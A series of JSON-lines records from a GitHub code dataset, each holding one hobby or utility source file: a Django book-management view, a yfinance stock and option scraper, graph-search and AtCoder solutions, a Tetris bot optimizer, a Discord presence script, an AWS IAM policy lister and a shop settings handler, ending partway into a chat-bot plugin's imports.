Authors.objects.filter(aid=aid).first()\n book.authors.add(author)\n\n return HttpResponse('OK')\n\n return redirect('/bms/show/')\n\n\ndef book_msg(request):\n\n book_id = request.GET.get('book_id')\n\n ret = {}\n a_id = []\n publish = serializers.serialize('json', Publish.objects.all())\n author = serializers.serialize('json', Authors.objects.all())\n book = Books.objects.filter(id=book_id).first()\n pname = book.publishb.pname\n au = book.authors.all()\n\n for i in au:\n a_id.append(i.aid)\n\n ret['publish'] = publish\n ret['author'] = author\n ret['a_id'] = a_id\n ret['pname'] = pname\n ret['book'] = serializers.serialize('json', Books.objects.filter(id=book_id))\n\n return HttpResponse(json.dumps(ret))","repo_name":"summer5625/Mygit","sub_path":"第六模块_WEB框架/Django框架/mBMS/bms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38285275644","text":"import yfinance as yf\nimport pandas as pd\nimport os\nimport copy\nimport pytz\nimport json\nimport math\n\nfrom statsmodels.graphics.tsaplots import plot_acf\n\nimport matplotlib.pyplot as plt\n\nfrom json import JSONEncoder\nfrom datetime import datetime\nfrom time import sleep\nfrom pathlib import Path\n\n#############################\n# Helper functions\n\nclass StockEncoder(JSONEncoder):\n\tdef default(self, obj):\n\t\tif isinstance(obj, Stock):\n\t\t\treturn stock_as_dict(obj)\n\t\t# If not handled, return default\n\t\treturn JSONEncoder.default(self,obj)\n\nclass DownloaderEncoder(JSONEncoder):\n\tdef default(self, obj):\n\t\tif isinstance(obj, Downloader):\n\t\t\toutput_dict = {}\n\t\t\tfor s in obj.stock_list:\n\t\t\t\ttemp_json = stock_as_dict(s)\n\t\t\t\toutput_dict[s.ticker] = temp_json\n\t\t\treturn output_dict\n\t\treturn JSONEncoder.default(self, obj)\n\ndef as_stock(dict):\n\t# No error handling at the moment\n\tstock_list = []\n\tfor k1, v1 in dict.items():\n\t\tprint(\"Creating new stock object for: \" + v1[\"ticker\"])\n\t\tstock_list.append(Stock.from_dict(v1))\n\treturn stock_list\n\ndef stock_as_dict(obj):\n\toutput_dict = {}\n\toutput_dict[\"ticker\"] = obj.ticker\n\toutput_dict[\"data_endpoint\"] = obj.data_endpoint\n\toutput_dict[\"datetime_run\"] = obj.datetime_run\n\t\n\toutput_dict[\"stock_price_history\"] = obj.stock_price_history.to_json()\n\n\toption_chain_list = []\n\tfor it in obj.option_chains:\n\t\toption_chain_list.append(it.to_json())\n\n\toutput_dict[\"option_chains\"] = option_chain_list \n\treturn output_dict\n\n###############################\n\nclass Downloader:\n\tdef __init__(self, ticker_list_name):\n\t\tself.ticker_list_name = ticker_list_name\n\t\tself.ticker_list_path = os.path.join(os.getcwd(), 'tickers.txt')\n\t\tself.ticker_list = []\n\t\tself.stock_list = []\n\n\tdef read_tickers(self):\n\t\twith open(self.ticker_list_path) as f:\n\t\t\tfinished = False\n\t\t\tticker_list_temp = []\n\n\t\t\twhile (finished == False):\n\t\t\t\tline = f.readline()\n\n\t\t\t\t# EOF\n\t\t\t\tif len(line) == 0:\n\t\t\t\t\tfinished = True\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\tline = line.rstrip('\\n')\n\t\t\t\t# Found a new set of tickers\n\t\t\t\tif line.find(\"#\") > -1:\n\t\t\t\t\t# Check if we are at the list of tickers we want to be\n\t\t\t\t\tif line.replace(\"#\", \"\") == self.ticker_list_name:\n\t\t\t\t\t\t# Read until end of section reached ('#')\n\t\t\t\t\t\twhile (True):\n\t\t\t\t\t\t\tsection_line = f.readline().rstrip('\\n') \n\t\t\t\t\t\t\tif (section_line == \"#\"):\n\t\t\t\t\t\t\t\tfinished = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\tticker_list_temp.append(section_line)\n\t\t\tself.ticker_list = copy.deepcopy(ticker_list_temp)\n\t\n\tdef download_stock_data(self, start_dt=None, end_dt=None):\n\t\tfor s in self.stock_list:\n\t\t\tprint(\"Downloading stock data for \" + s.ticker + \" with start_dt \" + str(start_dt) + \" and end_dt \" + str(end_dt))\n\t\t\ts.download_stock_price_data(start_dt, end_dt)\n\n\tdef download_options_data(self):\n\t\tfor s in self.stock_list:\n\t\t\tprint(\"Downloading options data for \" + s.ticker + \".\")\n\t\t\ts.download_options_data()\n\n\tdef build_stock_objects(self):\n\t\tif (len(self.ticker_list) == 0):\n\t\t\tprint('Ticker list is empty.')\n\t\tfor t in self.ticker_list:\n\t\t\tself.stock_list.append(Stock(t))\n\n\tdef initialize(self):\n\t\tself.read_tickers()\n\t\tself.build_stock_objects()\n\n\nclass OptionChain:\n\tdef __init__(self, ticker, date, calls = None, puts = None, updated_time = None):\n\t\tself.ticker = ticker\n\t\tself.date = date\n\t\tself.calls = calls\n\t\tself.puts = puts\n\t\tself.updated_time = updated_time\n\n\tdef to_json(self):\n\t\toutput_dict = {}\n\t\toutput_dict[\"ticker\"] = self.ticker\n\t\toutput_dict[\"date\"] = self.date\n\t\toutput_dict[\"calls\"] = self.calls.to_json() if self.calls is not None else None\n\t\toutput_dict[\"puts\"] = self.puts.to_json() if self.puts is not None else None\n\t\toutput_dict[\"updated_time\"] = self.updated_time\n\t\treturn output_dict\n\t\n\t@classmethod\n\tdef from_dict(cls, dict):\n\t\tticker = dict[\"ticker\"]\n\t\tdate = dict[\"date\"] \n\t\t#calls = pd.read_json(dict[\"calls\"]) if dict[\"calls\"] is not None else None\n\t\t#puts = pd.read_json(dict[\"puts\"]) if dict[\"puts\"] is not None else None\n\t\tcalls = pd.read_json(dict[\"calls\"]).set_index(\"contractSymbol\", drop=True, inplace=False).rename_axis(\"contractSymbol\") if dict[\"calls\"] is not None else None\n\t\tputs = pd.read_json(dict[\"puts\"]).set_index(\"contractSymbol\", drop=True, inplace=False).rename_axis(\"contractSymbol\") if dict[\"puts\"] is not None else None\n\t\tupdated_time = dict[\"updated_time\"]\n\t\treturn OptionChain(ticker, date, calls, puts, updated_time)\n\nclass Stock:\n\tdef __init__(self, ticker, datetime_run = None, data_endpoint = \"yfinance\"):\n\t\tself.ticker = ticker\n\t\tself.stock_price_history = pd.DataFrame()\n\t\tself.option_chains = []\n\t\tself.yfinance_ticker_object = None\n\t\tself.data_endpoint = \"yfinance\"\n\t\tself.datetime_run = None\n\n\t\tself.update_object_based_on_data_endpoint()\n\n\t@classmethod\n\tdef from_dict(cls, dict):\n\t\ts = cls(dict[\"ticker\"], dict[\"datetime_run\"], dict[\"data_endpoint\"])\n\n\t\ts.stock_price_history = pd.read_json(dict[\"stock_price_history\"]) if \"stock_price_history\" in dict else None\n\n\t\toption_chain_list = dict[\"option_chains\"] if \"option_chains\" in dict else None\n\t\tfor chain in option_chain_list:\n\t\t\ts.option_chains.append(OptionChain.from_dict(chain))\n\t\treturn s\n\n\tdef get_last_close_price(self):\n\t\tif self.stock_price_history.empty is True:\n\t\t\treturn \"Stock price history not initialized.\"\n\t\treturn self.stock_price_history.tail(1)[\"Close\"][0]\n\n\tdef download_stock_price_data(self, start_dt = None, end_dt = None):\n\t\tself.stock_price_history = self.yfinance_ticker_object.history(start=start_dt, end=end_dt)\n\n\tdef get_option_chains_merged(self, format=\"dataframe\"):\n\t\tif self.calls == None or self.puts == None:\n\t\t\treturn None\n\n\t\tif format == \"dataframe\":\n\t\t\t# Transform the option chains into one dataframe\n\t\t\t\n\t\t\t# Fix this, stupid [0] reference\n\t\t\tcolumns = self.option_chains[0].calls.columns.to_list() + [\"type\", \"updated_time_dt\", \"updated_time_hours\"]\n\t\t\t#columns = self.calls.columns.to_list()\n\t\t\toutput_df = pd.DataFrame(columns=columns)\n\n\t\t\t# Fix this, stupid [0] reference\n\t\t\tcalls_df = pd.DataFrame(columns=self.option_chains[0].calls.columns.to_list())\n\t\t\tputs_df = pd.DataFrame(columns=self.option_chains[0].puts.columns.to_list())\n\n\t\t\tfor c in self.option_chains:\n\t\t\t\tupdate_time_temp = c.updated_time.split(\" \")\n\n\t\t\t\tcalls_df = calls_df.append(c.calls)\n\t\t\t\tcalls_df[\"type\"] = \"call\"\n\t\t\t\tcalls_df[\"updated_time_dt\"] = update_time_temp[0]\n\t\t\t\tcalls_df[\"updated_time_hours\"] = update_time_temp[1]\n\n\t\t\t\tputs_df = puts_df.append(c.puts)\n\t\t\t\tputs_df[\"type\"] = \"put\"\n\t\t\t\tputs_df[\"updated_time_dt\"] = update_time_temp[0]\n\t\t\t\tputs_df[\"updated_time_hours\"] = update_time_temp[1]\n\n\t\t\toutput_df = output_df.append(calls_df)\n\t\t\toutput_df = output_df.append(puts_df)\n\t\t\toutput_df[\"expiration_date\"] = output_df.apply(lambda row: self._get_expiration_date_helper(row.name), axis=1)\n\n\t\t\treturn output_df.fillna(0)\n\n\tdef _get_expiration_date_helper(self, input):\n\t\toffset = len(self.ticker)\n\t\tyear = \"20\" + input[offset+0:offset+2]\n\t\tmonth = input[offset+2:offset+4]\n\t\tday = input[offset+4:offset+6]\n\t\t\n\t\treturn year + \"-\" + month + \"-\" + day\n\t\t#[len(self.ticker):len(self.ticker)+6]\n\n\n\tdef update_object_based_on_data_endpoint(self):\n\t\tif (self.data_endpoint == \"yfinance\"):\n\t\t\tself.yfinance_ticker_object = yf.Ticker(self.ticker)\n\t\telse:\n\t\t\tself.yfinance_ticker_object = None\n\n\tdef download_options_data(self):\n\t\tif self.data_endpoint == \"yfinance\":\n\t\t\tself.datetime_run = datetime.now().strftime(\"%Y-%m-%d %H-%M\")\n\t\t\ttry:\n\t\t\t\t# No error handling in yfinance package, hence this\n\t\t\t\texpirations = self.yfinance_ticker_object.options\n\t\t\t\tfor date in expirations:\n\t\t\t\t\tprint(\"Downloading options data for: \" + self.ticker + \" with date \" + date)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcurrent_option = self.yfinance_ticker_object.option_chain(date)\n\t\t\t\t\t\tself.option_chains.append(OptionChain(self.yfinance_ticker_object.ticker, date, current_option.calls, current_option.puts, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Exception found with previous request, see above line.\")\n\t\t\t\t\t\tself.option_chains.append(OptionChain(self.yfinance_ticker_object.ticker, date, None, None, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\t\texcept:\n\t\t\t\tprint(\"No option chains found for this ticker.\")\n\t\n\tdef as_string(self, delimiter=','):\n\t\tdata = self.__dict__\n\t\toutput_str = \"\"\n\t\tfor key, value in data.items():\n\t\t\t# This should be implemented recursively to account for arbitrary data structures\n\t\t\tif (isinstance(value, list) == True):\n\t\t\t\tfor it1 in value:\n\t\t\t\t\tfor k1, v1 in value.__dict__.items():\n\t\t\t\t\t\toutput_str = output_str + delimiter + str(v1)\n\t\t\telse:\n\t\t\t\toutput_str = output_str + delimiter + str(value)\n\t\treturn output_str.replace(delimiter, \"\", 1) # remove first delimiter\n\tdef make_json(self):\n\t\t\t# TODO: Write custom encoder\n\t\t\t# especially problematic: isinstance(n.option_chains[0].calls, pd.DataFrame)\n\t\t\treturn json.dumps(self, default=lambda o: o.to_json(), sort_keys=True)\n\ndef double_result_decorator(f):\n\tdef wrapper(*args):\n\t\tvalue = f(*args)\n\t\treturn round(value * 100, 2)\n\n\treturn wrapper\n\nclass CorrelationModule:\n\t# The purpose of this module is calculate anything related to cross correlations of time-series\n\tdef __init__(self):\n\t\tself.df = None\n\t\tpass\n\n\tdef get_cross_correlation(self):\n\t\t# between explicit columns or all\n\t\tself.df.corr()\n\n\tdef get_most_correlated_series(self):\n\t\t# between a given column and the rest of the data, which are the most correlated series\n\t\tpass\n\nclass DataObject:\n\t# Manages the data of the current workspace\n\tdef __init__(self):\n\t\tpass\n\nclass Volatility:\n\tdef __init__(self, series, series_data_field=\"close\", type=\"daily\"):\n\t\t# Assumes DF with index as a date or something that can be ordered\n\t\t# Input must be a dataframe with index of something to be sorted, the value with the 'series_name' \n\t\tself.time_series_daily = series.copy(deep=True)\n\t\tself.time_series_monthly = None\n\t\tself.series_data_field = series_data_field\n\t\tself.type = type\n\n\t\tself._initialize()\n\n\tdef _initialize(self):\n\t\tself.time_series_daily[\"tomorrows_close\"] = self.time_series_daily[self.series_data_field].shift(-1)\n\t\t\n\t\tself.time_series_daily[\"change\"] = self.time_series_daily.apply(lambda row: (row[\"tomorrows_close\"] - row[self.series_data_field]) / row[self.series_data_field], axis=1 )\n\t\tself.time_series_daily[\"change_log\"] = self.time_series_daily.apply(lambda row: math.log(row[\"tomorrows_close\"] / row[self.series_data_field]), axis=1 )\n\t\t\n\t\tself.time_series_daily.drop([\"tomorrows_close\"], inplace=True, axis=1)\n\t\tself.time_series_daily.dropna(inplace=True)\n\t\t\n\t\tif type is \"daily\":\n\t\t\ttemp_monthly_df = self.time_series_daily.copy(deep=True) \n\t\t\ttemp_monthly_df[\"is_month_end\"] = temp_monthly_df.index.is_month_end\n\t\t\tself.time_series_monthly = temp_monthly_df[temp_monthly_df.is_month_end == True]\n\t\t\tself.time_series_monthly[\"next_months_close\"] = self.time_series_monthly.shift(-1)\n\t\t\tself.time_series_monthly[\"monthly_change\"] = self.time_series_monthly.apply(lambda row: (row[\"next_months_close\"] - row[self.series_data_field]) / row[self.series_data_field], axis=1 )\n\t\t\tself.time_series_monthly.drop([\"monthly_change\"], inplace=True, axis=1)\n\t\t\tself.time_series_monthly.dropna(inplace=True)\n\t\n\t@double_result_decorator\n\tdef get_annualized(self, last_days=None):\n\t\t# Assumes that price_history is by day\n\t\tif last_days == None:\n\t\t\treturn self.time_series_daily[\"change\"].std() * math.sqrt(252)\n\t\t\n\t\t# Return the annualized volatility based on last_days number of days. \n\t\t# Assumes the data is sorted ascending\n\t\treturn self.time_series_daily.tail(last_days)[\"change\"].std() * math.sqrt(252)\n\t\n\t@double_result_decorator\t\n\tdef get_daily(self, last_days=None):\n\t\tif last_days == None:\n\t\t\treturn self.time_series_daily[\"change\"].std()\n\t\t\n\t\treturn self.time_series_daily.tail(last_days)[\"change\"].std()\n\n\t@double_result_decorator\n\tdef get_monthly(self, last_periods=None, daily_scaled=True):\n\t\tif daily_scaled == True:\n\t\t\t# Assumes that price_history is by day\n\t\t\t# Assumes 21 trading days\n\n\t\t\tif last_periods == None:\n\t\t\t\treturn self.time_series_daily[\"change\"].std() * math.sqrt(21)\n\t\t\n\t\t\t# Return the annualized volatility based on last_days number of days. \n\t\t\t# Assumes the data is sorted ascending\n\t\t\treturn self.time_series_daily.tail(last_periods)[\"change\"].std() * math.sqrt(21)\n\t\t\n\t\tif last_periods == None:\n\t\t\treturn self.time_series_monthly[\"monthly_change\"].std()\n\t\treturn self.time_series_monthly[\"monthly_change\"].tail(last_periods).std()\n\t\n\t@double_result_decorator\n\tdef get_weekly(self):\n\t\t# Assumes that price_history is by day\n\t\t# Assumes 5 trading days\n\n\t\tif last_days == None:\n\t\t\treturn self.time_series_daily[\"change\"].std() * math.sqrt(5)\n\t\t\n\t\t# Return the annualized volatility based on last_days number of days. \n\t\t# Assumes the data is sorted ascending\n\t\treturn self.time_series_daily.tail(last_days)[\"change\"].std() * math.sqrt(5)\n\n\t@double_result_decorator\n\tdef\tget_realized_volatility(self, period_type, periods, roll_period=0):\n\t\t# daily, weekly, monthly, yearly\n\t\tif period_type == 'daily':\n\t\t\treturn self.time_series_daily.tail(periods)[\"change\"].std()\n\n\t\tif period_type == 'weekly':\n\t\t\treturn None\n\n\t\tif period_type == 'monthly':\n\t\t\treturn self.time_series_monthly.tail(periods)[\"monthly_change\"].std()\n\t\n\t\tif period_type == 'rolling':\n\t\t\treturn self.time_series_daily.rolling(roll_period).std()\n\n\tdef plot_realized_volatility(self, period_type, roll_periods):\n\t\t# params: \n\t\t#\t'period_type' : string, 'rolling'\n\t\t#\t'roll_periods' : list of numbers, '[5, 20, 60]'\n\t\tif period_type == 'rolling':\n\t\t\tfor p in roll_periods:\n\t\t\t\tplt.plot(self.time_series_daily[self.series_data_field].rolling(p).std(), label=str(p))\n\t\t\tplt.legend()\n\t\t\tplt.show()\n\n\tdef get_mean(self):\n\t\tpass\n\n\tdef get_moving_average(self):\n\t\tpass\n\n\tdef plot_acf(self):\n\t\tplot_acf(self.time_series_daily[\"change\"])\n\t\tplt.show()\n\n\tdef plot_histogram(self, bins=250, log=False):\n\t\tif log is False:\n\t\t\tself.time_series_daily.hist(column=\"change\", bins=bins)\n\t\telse:\n\t\t\tself.time_series_daily.hist(column=\"change_log\", bins=bins)\n\t\tplt.show()\n\n\tdef get_return_descriptive_statistics(self, number_of_periods=None):\n\t\t# mean, mode, std, kurtosis, skewness\n\t\tprint(\"Mean: \" + str(self.time_series_daily[\"change\"].mean()))\n\t\tprint(\"Median: \" + str(self.time_series_daily[\"change\"].median()))\n\t\tprint(\"Mode: \" + str(self.time_series_daily[\"change\"].mode()))\n\t\tprint(\"Std: \" + str(self.time_series_daily[\"change\"].std()))\n\t\tprint(\"Kurtosis: \" + str(self.time_series_daily[\"change\"].kurt()))\n\t\tprint(\"Skew: \" + str(self.time_series_daily[\"change\"].skew()))\n\t\t\n\n\tdef plot(self):\n\t\tpass","repo_name":"orentola/stock-and-option-price-scraper","sub_path":"stock-and-option-price-scraper/stockmodule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212815205","text":"import sys\r\nfrom collections import defaultdict, deque\r\n\r\n\r\nclass Graph:\r\n def __init__(self) -> None:\r\n self.N: int\r\n self.M: int\r\n self.V: int\r\n self.graph: defaultdict[int, list[int]] = defaultdict(list)\r\n self.get_info()\r\n\r\n def get_info(self) -> None:\r\n self.N, self.M, self.V = map(int, input().split())\r\n for _ in range(self.M):\r\n u, v = map(int, input().split())\r\n self.graph[u].append(v)\r\n self.graph[v].append(u)\r\n\r\n def DFS(self) -> list[int]:\r\n stack = [self.V]\r\n ans: list[int] = []\r\n for value in self.graph.values():\r\n value.sort(reverse=True)\r\n checked: set[int] = set()\r\n while stack:\r\n u = stack.pop()\r\n if u in checked:\r\n continue\r\n ans.append(u)\r\n checked.add(u)\r\n stack.extend(self.graph[u])\r\n return ans\r\n\r\n def BFS(self) -> list[int]:\r\n Q = deque([self.V])\r\n ans: list[int] = []\r\n for value in self.graph.values():\r\n value.sort()\r\n checked: set[int] = set()\r\n while Q:\r\n u = Q.popleft()\r\n if u in checked:\r\n continue\r\n ans.append(u)\r\n checked.add(u)\r\n Q.extend(self.graph[u])\r\n return ans\r\n\r\n\r\ndef main():\r\n graph = Graph()\r\n print(*graph.DFS())\r\n print(*graph.BFS())\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Silver/1260. DFS와 BFS/DFS와 BFS.py","file_name":"DFS와 BFS.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72819361446","text":"class point:\n def __init__(self,x=0,y=0):\n self.x=x\n self.y=y\n def __str__(self):\n return \"({0},{1})\".format(self.x,self.y)\n def __lt__(self, other):\n self_call=(self.x**2)+(self.y**2)\n other_call=(other.x**2)+(other.y**2)\n return (self_call 0\n return drops[0]\n\n @staticmethod\n def get_keystrokes(rotation, column, keymap, tetromino):\n keys = []\n # First we orient the tetronimo\n if rotation == 1:\n keys.append(keymap['rotate_right'])\n elif rotation == 2:\n keys.append(keymap['rotate_right'])\n keys.append(keymap['rotate_right'])\n elif rotation == 3:\n keys.append(keymap['rotate_left'])\n # Then we move it all the way to the the left that we are guaranteed\n # that it is at column 0. The main reason for doing this is that when\n # the tetromino is rotated, the bottom-leftmost piece in the tetromino\n # may not be in the 3rd column due to the way Tetris rotates the piece\n # about a specific point. There are too many edge cases so instead of\n # implementing tetromino rotation on the board, it's easier to just\n # flush all the pieces to the left after orienting them.\n #for i in range(4):\n # keys.append(keymap['move_left'])\n # Now we can move it back to the correct column. Since pyautogui's\n # typewrite is instantaneous, we don't have to worry about the delay\n # from moving it all the way to the left.\n print(str(column) + \" : \" + tetromino + \" : \" + str(rotation))\n if column == 4 and tetromino == \"s\":\n pass\n if column == 3 and tetromino == \"t\":\n pass\n elif column == 5 and tetromino != \"i\" and tetromino != \"j\" and tetromino != \"s\" and tetromino != \"t\" and tetromino != \"z\" and tetromino != \"o\" and tetromino != \"l\":\n pass\n elif column < 4:\n if rotation == 1:\n if tetromino == \"i\":\n for i in range(column - 5):\n keys.append(keymap['move_right'])\n if tetromino == \"s\":\n for i in range(4 - column):\n keys.append(keymap['move_left'])\n else:\n for i in range(4 - column):\n keys.append(keymap['move_left'])\n else:\n for i in range(3 - column):\n keys.append(keymap['move_left'])\n\n if tetromino == \"o\":\n keys.append(keymap['move_left'])\n pass\n else:\n if rotation == 1 or rotation == 3:\n if tetromino == \"i\":\n for i in range(column - 5):\n keys.append(keymap['move_right'])\n if tetromino == \"s\" or tetromino == \"t\" or tetromino == \"z\":\n for i in range(column - 4):\n keys.append(keymap['move_right'])\n else:\n for i in range(column - 3):\n keys.append(keymap['move_right'])\n else:\n if tetromino == \"z\" or tetromino == \"s\" or tetromino == \"t\" or tetromino == \"i\" or tetromino == \"j\" or tetromino == \"i\" or tetromino == \"l\":\n for i in range(column - 3):\n keys.append(keymap['move_right'])\n else:\n for i in range(column - 4):\n keys.append(keymap['move_right'])\n pass\n\n keys.append(keymap['drop'])\n return keys\n\nif __name__ == '__main__':\n f = Field()\n f.drop(Tetromino.TTetromino(), 3)\n opt = Optimizer.get_optimal_drop(\n f['tetromino_rotation'], f['tetromino_column'], Tetromino.ITetromino())\n print(opt['field'])\n","repo_name":"Swofty-Developments/JStris-Python-Bot","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69877709604","text":"# https://pypi.org/project/discord-rpc/\n\nimport DiscordRPC\nimport time\n\nrpc = DiscordRPC.RPC.Set_ID(app_id=975275670345228358)\n\nrpc.set_activity(\n state=\"Spotify App\",\n details=\"Driving on the I-95\",\n large_image=\"android_auto_logo\",\n small_image=\"spotify_app_logo_svg\",\n timestamp=time.time()\n )\n\nrpc.run()","repo_name":"AstridWasHereLOL/Python-test-stuff","sub_path":"discord-rpc.py","file_name":"discord-rpc.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"7401851111","text":"from random import randint\n\nwhile True:\n rand = randint(1,100)\n print('I am thinking of a number between 1 and 100.')\n for i in range(10,0,-1):\n print(f'You have {i} guesses left. Take a guess.')\n while True:\n try:\n n = int(input('>'))\n except ValueError:\n continue\n break\n if n>rand:\n print('Your guess is too high.')\n elif n List[str]:\n \"\"\" Retrieve a list of role names by paginating over list_roles() calls \"\"\"\n roles = []\n role_paginator = client.get_paginator('list_roles')\n for response in role_paginator.paginate():\n response_role_names = [r.get('RoleName') for r in response['Roles']]\n roles.extend(response_role_names)\n return roles\n\ndef get_attached_policies_for_roles(role_names: List[str]) -> Dict[str, List[Dict[str, str]]]:\n \"\"\" Create a mapping of role names and any policies they have attached to them by \n paginating over list_attached_role_policies() calls for each role name. \n Attached policies will include policy name and ARN.\n \"\"\"\n policy_map = {}\n policy_paginator = client.get_paginator('list_attached_role_policies')\n for name in role_names:\n print(name)\n if name.startswith('alpha_'):\n role_policies = []\n for response in policy_paginator.paginate(RoleName=name):\n print(\"Role: {0}\\n Policy: {1}\\n\".format(name,response.get('AttachedPolicies')))\n role_policies.extend(response.get('AttachedPolicies'))\n policy_map.update({name: role_policies})\n return policy_map\n\ndef get_policies_for_roles(role_names: List[str]) -> Dict[str, List[Dict[str, str]]]:\n \"\"\" Create a mapping of role names and any policies they have attached to them by \n paginating over list_attached_role_policies() calls for each role name. \n Attached policies will include policy name and ARN.\n \"\"\"\n policy_map = {}\n policy_paginator = client.get_paginator('list_role_policies')\n for name in role_names: \n if name.startswith('alpha_user'):\n role_policies = []\n for response in policy_paginator.paginate(RoleName=name):\n role_policies.extend(response.get('PolicyNames'))\n for policy in response.get('PolicyNames'):\n role_policy = client.get_role_policy(RoleName=name,PolicyName=policy)\n content = role_policy['PolicyDocument']\n for statement in content['Statement']:\n sid = \"\"\n if 'Sid' in statement:\n sid = statement['Sid']\n if isinstance(statement['Resource'],str):\n resource = statement['Resource']\n if resource.startswith('arn:aws:s3:::'):\n resource = resource[13:]\n username = name\n if name.startswith('alpha_user_'):\n username = name[11:]\n if resource!=\"*\" and sid!='list' and policy!=\"database-access\":\n print(username+\",\"+resource+\",\"+sid+\",\"+policy)\n else: \n for resource in statement['Resource']:\n if resource.startswith('arn:aws:s3:::'):\n resource = resource[13:]\n username = name\n if name.startswith('alpha_user_'):\n username = name[11:]\n if resource!=\"*\" and sid!='list' and policy!=\"database-access\":\n print(username+\",\"+resource+\",\"+sid+\",\"+policy) \n policy_map.update({name: role_policies})\n return policy_map\n\nrole_names = get_role_names()\nrole_policies = get_policies_for_roles(role_names)\n\n","repo_name":"ministryofjustice/data-platform","sub_path":"scripts/archive/analytical-platform-infrastructure/s3_assignments_comparison/list_policies.py","file_name":"list_policies.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"9612331619","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n#from https://atcoder.jp/contests/abc137/submissions/6808061\nimport heapq\nimport sys\ninput=sys.stdin.readline\n\ndef sol():\n n,m=map(int,input().split())\n d=[]\n for i in range(n):\n a,b=map(int,input().split())\n if a<=m: d.append((a,b))\n d.sort(reverse=True)\n q=[]\n ans=0\n for i in range(1,m+1):\n while d and d[-1][0]<=i:\n a,b=d.pop()\n heapq.heappush(q,-b)\n if q:\n ans += -heapq.heappop(q)\n print(ans)\n \nif __name__==\"__main__\":\n sol()\n\n\"\"\"\n \ndef sol():\n n,m=map(int,input().split())\n d=[]\n ans=[0]*(m+1)\n t=0\n ans[0]=1\n y=m\n for i in range(n):\n a,b=map(int,input().split())\n if a<=m: heapq.heappush(d,(-b,-a))\n while len(d):\n bb,aa=heapq.heappop(d)\n aa*=-1\n if 0 not in ans:\n break\n if max(ans.index(0),aa)==y:\n ans[y]=1\n t+=bb\n y-=1\n else:\n for j in range(max(ans.index(0),aa),y+1):\n if ans[j]==0:\n ans[j]=1\n t+=bb\n break\n \n print(-1*t)\n \nif __name__==\"__main__\":\n sol()\n\"\"\"\n","repo_name":"clarinet758/atcoder","sub_path":"abc/b126_150/b137/d1.py","file_name":"d1.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15377278600","text":"#coding:utf-8\nfrom util.handler import BaseHandler,authenticated\nfrom model.shop import Shop\n\n'''\n基础管理模块\n'''\nclass SettingHandler(BaseHandler):\n @authenticated(\"\")\n def get(self):\n data = self.shop.simple_data\n self.json_message(200, data, \"ok\")\n\n @authenticated(\"m_setting\")\n def post(self):\n name = self.get_argument(\"name\", \"\")\n if not name:\n self.json_message(201,{}, \"请填写品牌名称\")\n\n service_phone = self.get_argument(\"service_phone\", \"\")\n announcement = self.get_argument(\"announcement\", \"\")\n\n close_desc = self.get_argument(\"close_desc\", \"\")\n status = int(self.get_argument(\"status\", 0))\n password = self.get_argument(\"password\", \"\")\n\n '''\n 积分\n '''\n reward_point_enabled = True if self.get_argument(\"reward_point_enabled\", \"\") == \"true\" else False\n initial_ratio = int(self.get_argument(\"initial_ratio\", 0))\n reward_point_limit = int(self.get_argument(\"reward_point_limit\", 0))\n exchange_ratio = int(self.get_argument(\"exchange_ratio\",0))\n\n '''\n 订单\n '''\n trade_expired_after = int(self.get_argument(\"trade_expired_after\",30))\n trade_expired_after = trade_expired_after if trade_expired_after>30 else 30\n \n auto_delivered_received = True if self.get_argument(\"auto_delivered_received\", \"\") == \"true\" else False\n\n auto_received_day = int(self.get_argument(\"auto_received_day\", 0))\n auto_delivered_received = True if self.get_argument(\"auto_delivered_received\", \"\") == \"true\" else False\n\n \n logo_image_path = self.get_argument(\"logo_image_path\", \"\")\n \n model = self.shop\n\n\n model.logo_image_path = logo_image_path\n\n model.name = name\n model.service_phone = service_phone\n model.announcement = announcement\n model.close_desc = close_desc\n model.password = password\n model.status = status\n\n\n model.reward_point_enabled = reward_point_enabled\n model.initial_ratio = initial_ratio\n model.reward_point_limit = reward_point_limit\n model.exchange_ratio = exchange_ratio\n\n model.trade_expired_after = trade_expired_after\n model.auto_delivered_received = auto_delivered_received\n model.auto_received_day = auto_received_day\n model.auto_delivered_received = auto_delivered_received\n model.save()\n\n self.json_message(200, {}, \"ok\")\n\n\nclass check_init_module(BaseHandler):\n def get(self):\n self.json_message(200, {\"init\":True})\n \nhandlers = [\n (r\"/main/api/setting\", SettingHandler),\n (r\"/main/api/check_init_module\", check_init_module)\n]","repo_name":"hellousworld/saas","sub_path":"handler/main/api/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33319737398","text":"from argparse import Namespace\nfrom typing import Tuple, Union, overload\n\nfrom nonebot.adapters.onebot.v11 import Bot, MessageEvent, MessageSegment\nfrom nonebot.exception import ActionFailed\nfrom nonebot.params import ShellCommandArgs\nfrom nonebot.rule import ArgumentParser\nfrom PIL import Image\n\nfrom util import command, context, imutil, misc, textutil\nfrom util.user_aliases import AvatarGetter, 